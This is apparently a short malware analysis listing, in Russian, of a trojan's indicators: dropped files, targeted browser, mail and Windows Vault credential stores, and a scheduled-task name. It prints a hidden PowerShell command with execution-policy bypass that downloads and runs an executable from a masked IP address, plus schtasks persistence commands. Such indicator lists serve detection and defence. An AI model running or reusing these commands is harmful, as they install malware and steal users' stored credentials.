Техническая информация
- <SYSTEM32>\tasks\updates\tbyejuo
- http://19#.#.31.220/chiqsxlktfhlygu.exe как %appdata%\fhlygu.exe
- fhlygu.exe
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\thunderbird\profiles.ini
- %TEMP%\abctfhghghghghž.sct
- %APPDATA%\fhlygu.exe
- %APPDATA%\tbyejuo.exe
- %TEMP%\tmp8dd1.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\tmp8dd1.tmp
- http://19#.#.31.220/cHIqsXlKTFhLygU.exe
- '%APPDATA%\fhlygu.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://19#.#.31.220/cHIqsXlKTFhLygU.exe','%APPDATA%\FhLygU.exe');Start-Proces...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\tbYejUO" /XML "%TEMP%\tmp8DD1.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\tbYejUO" /XML "%TEMP%\tmp8DD1.tmp"